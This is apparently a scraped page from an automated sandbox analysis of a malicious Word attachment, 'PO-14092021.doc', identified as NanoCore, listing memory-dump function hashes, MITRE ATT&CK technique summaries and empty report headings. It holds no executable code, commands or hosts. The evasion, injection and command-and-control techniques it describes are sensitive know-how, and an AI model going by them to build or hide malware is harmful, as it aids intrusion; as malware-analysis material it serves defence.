Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: 8209352765f5c6a67d7d744aa2f8d5e875b4e15d8af42515bc2f42592f5be771
Instruction ID: 372cd71dde138ec643d15484e7da79c27e934df2fe81ca9f5e21403be7740132
Opcode Fuzzy Hash: 8209352765f5c6a67d7d744aa2f8d5e875b4e15d8af42515bc2f42592f5be771
Instruction Fuzzy Hash: E42117303012128FDB5DAB78C428A6D36E2AFD5711B1404BDE40ACF7A5EE3ADC469B81

Uniqueness

Uniqueness Score: -1.00%

Function 0016A336, Relevance: 1.3, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 0016A39C

Memory Dump Source

Source File: 00000012.00000002.452200070.000000000016A000.00000040.00000001.sdmp, Offset: 0016A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_16a000_smtpsvc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a34f05ca970877be7b8866cbd7d70d9e03d15bd0302b20d227d1a81b100a86dd
Instruction ID: a2a002a7e6658a668a82adabe10bca8098868bc64f44ff9e35ed87f3505a7fbe
Opcode Fuzzy Hash: a34f05ca970877be7b8866cbd7d70d9e03d15bd0302b20d227d1a81b100a86dd
Instruction Fuzzy Hash: C621AF755093C09FD7128B24DC45B56BFB4EF02220F0984EBDD85CF263C278A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0016A36A, Relevance: 1.3, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 0016A39C

Memory Dump Source

Source File: 00000012.00000002.452200070.000000000016A000.00000040.00000001.sdmp, Offset: 0016A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_16a000_smtpsvc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 51823dad293768902d2c15a949c0194eb64cd2fb9150a6c85f97cee3e7450f32
Instruction ID: 5851a2f44b5a5a6cbae6c84eb808cf74ba857186372e7de6a785047c15339338
Opcode Fuzzy Hash: 51823dad293768902d2c15a949c0194eb64cd2fb9150a6c85f97cee3e7450f32
Instruction Fuzzy Hash: 5201DF36501340CFEB108F15DC88769FB94EF00320F08C0AADC098B302D374E854DEA2

Uniqueness

Uniqueness Score: -1.00%

Function 002407E8, Relevance: .4, Instructions: 371
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2f5d43094f9fa3b99f841a29530b7e200935a8cd879f105830692ff6d3a73d
Instruction ID: 626bc3b09513e0a22ae4a1778c84a86fc3cf9ca0c7f7398fadf5a0717fe6ed98
Opcode Fuzzy Hash: 0e2f5d43094f9fa3b99f841a29530b7e200935a8cd879f105830692ff6d3a73d
Instruction Fuzzy Hash: BFF19E30210612CFD71CEF60D8C0A2A77B6FBC4319B24851DD64A8B6A9CB70EDC6DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00240DA0, Relevance: .1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6663adcea1f58b19476a69f50928b3f4703c1a1c5389e0af4d5d5e2cf7c670f5
Instruction ID: 026c9db9a35725e8ca8a4b4f8422c83d546c1f332ab50bbf22a3d7761c7f831e
Opcode Fuzzy Hash: 6663adcea1f58b19476a69f50928b3f4703c1a1c5389e0af4d5d5e2cf7c670f5
Instruction Fuzzy Hash: 12213A307042448FDB19E7B5981099E7FB6AFC5600F2440AAD405DB691CF785E4BC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00240E79, Relevance: .0, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a819890fe2c2cd0ca751fae586327a7684842ef32708f5d171d2cc401c65f8
Instruction ID: 356b7e5b48bf92b117eab9faa0a7d357f21a8e96644383175bba87dc61bafa31
Opcode Fuzzy Hash: 67a819890fe2c2cd0ca751fae586327a7684842ef32708f5d171d2cc401c65f8
Instruction Fuzzy Hash: DCF0427954D3900FCB1BDF54D8D04D67F709D5231575888DED5C44B213C730985ADBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00240EC8, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8067b6a732a3e9225e385c9595c85ee92d09ea521081dfac9b36056689f8158e
Instruction ID: 4f290936f8e393135e17297ac5d70faa043ff7d7cc5fff539f659c120f047f7a
Opcode Fuzzy Hash: 8067b6a732a3e9225e385c9595c85ee92d09ea521081dfac9b36056689f8158e
Instruction Fuzzy Hash: 0AF0A7316000508FC758FB7CE495D993BE6AF4521171545EAD80DCB379D9709C4ECF91

Uniqueness

Uniqueness Score: -1.00%

Function 00240099, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e802e47cb9fdcb5b0e4ef821bfcca2850a2e5b5f1bdb3f823a77dec90e8a96ee
Instruction ID: e864e3203a024ffe68a8edb6cb21d1aec13e062f4208e2bffadfe2761ce0ec5f
Opcode Fuzzy Hash: e802e47cb9fdcb5b0e4ef821bfcca2850a2e5b5f1bdb3f823a77dec90e8a96ee
Instruction Fuzzy Hash: 0BF0F871D0524A9FCB41DFBCD8849DEFFF0EE48214B60026AD609E3101E3311625CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0205081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.452608081.0000000002050000.00000040.00000040.sdmp, Offset: 02050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2050000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4682296e4f04832e2d08217fe617e8a0df5f1db1fdd55fee3c482281b94dad0
Instruction ID: 61c4be38bc3f38bb25d99b87cb43de0cd3a411421bb4e6f691b2edfd45a01d0e
Opcode Fuzzy Hash: a4682296e4f04832e2d08217fe617e8a0df5f1db1fdd55fee3c482281b94dad0
Instruction Fuzzy Hash: 74E092766017008BD650CF0AFC81456F7D4EB84A30B48C07FDC0E8B700D13AB505CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 002400A8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9389632aa217cef70f5a6e0bb672eaef4787003c4713f88eccb3b6f53a9ce2e
Instruction ID: 001825c56cbdc39136e3d80b2e0f2ebf78ecd53656aabd171085347873365ce6
Opcode Fuzzy Hash: c9389632aa217cef70f5a6e0bb672eaef4787003c4713f88eccb3b6f53a9ce2e
Instruction Fuzzy Hash: 1CE09A71E1121D9F8F40DFB999455DFFFF8EB48250F600466D619F3200E23156518BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00240D90, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2263e80902d57fccf0b6fc07e84417eb1e52c191597b03135c9603cbb3b085c9
Instruction ID: dfc7c941c2b5a010bcc0028f85d9486d4f7f207ca2923d1c2c09740101b26407
Opcode Fuzzy Hash: 2263e80902d57fccf0b6fc07e84417eb1e52c191597b03135c9603cbb3b085c9
Instruction Fuzzy Hash: 52E02631E083108FC724AB70E855AE93FB0EF01311F0401EADD09CB591EB76AD19CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00240ED8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c60477847688d26ec6b5d7006bfa8cfea165d03c3588e054b51ac180d56ee6
Instruction ID: 0a26ae5f5b4fc3d0ce586819dfd4ed4c2910620545429658fc4e3c5309e57098
Opcode Fuzzy Hash: 40c60477847688d26ec6b5d7006bfa8cfea165d03c3588e054b51ac180d56ee6
Instruction Fuzzy Hash: 4DE01A307101208FC758FB7CE448D5A37EFAB89266B1145AAE409CB378DA70AC49DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0024039B, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb48a1f50b2d501334fa1d7b36c7321f8634b388a636ad0459d6f1bc665c268b
Instruction ID: a00d552b7029d026ed26d2e574bfc789b77e6669553d8f5b03f5cf55a56bda40
Opcode Fuzzy Hash: fb48a1f50b2d501334fa1d7b36c7321f8634b388a636ad0459d6f1bc665c268b
Instruction Fuzzy Hash: 7DF01C70A152198BDB189F60D15C7AC7AF1AB48704F110458D106AB6A0CB744DD4CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00240D60, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df7cfc0910fefd01b0f6b66179b0ffab7ed0e81fccff922eed75c0cd890485fc
Instruction ID: c17f7565412124f107a2a50feb76c8dccaa9d6ab4fae05866a60c9a761864b9e
Opcode Fuzzy Hash: df7cfc0910fefd01b0f6b66179b0ffab7ed0e81fccff922eed75c0cd890485fc
Instruction Fuzzy Hash: A0D02B305092804FC3069FA4A0904557BB16B81220314406FC80AC7A55CB608C41C740

Uniqueness

Uniqueness Score: -1.00%

Function 001623F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.452190943.0000000000162000.00000040.00000001.sdmp, Offset: 00162000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_162000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b6781bb9a8e43671bbcb589f4429728ca9d01a085540ebfb3899f212c085f54
Instruction ID: 0be076b69831bd94aec6d60d35f9e2dc576fa499e94480251580d964a70dcb11
Opcode Fuzzy Hash: 0b6781bb9a8e43671bbcb589f4429728ca9d01a085540ebfb3899f212c085f54
Instruction Fuzzy Hash: 53D05E79304A818FD3168B1CC5A8BA537D4AF51B05F5644F9E800CB6A3CB78D991D200

Uniqueness

Uniqueness Score: -1.00%

Function 001623BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.452190943.0000000000162000.00000040.00000001.sdmp, Offset: 00162000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_162000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876bd5582557a8c677ea64b9383245949f69aa6c7c7af35cb5ef936e87b1007a
Instruction ID: c0f79c773947e897fbd2b6bf769bfe80f10f10e44a94b5d6bae75cfc249c4ae9
Opcode Fuzzy Hash: 876bd5582557a8c677ea64b9383245949f69aa6c7c7af35cb5ef936e87b1007a
Instruction Fuzzy Hash: 9DD05E34300A818BD719CB0CC694F5973E4BB44700F0644E9AC108B366C3B8DC90D600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report PO-14092021.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

Exploits:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 006F0200, Relevance: 5.5, Strings: 2, Instructions: 2991
COMMON

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre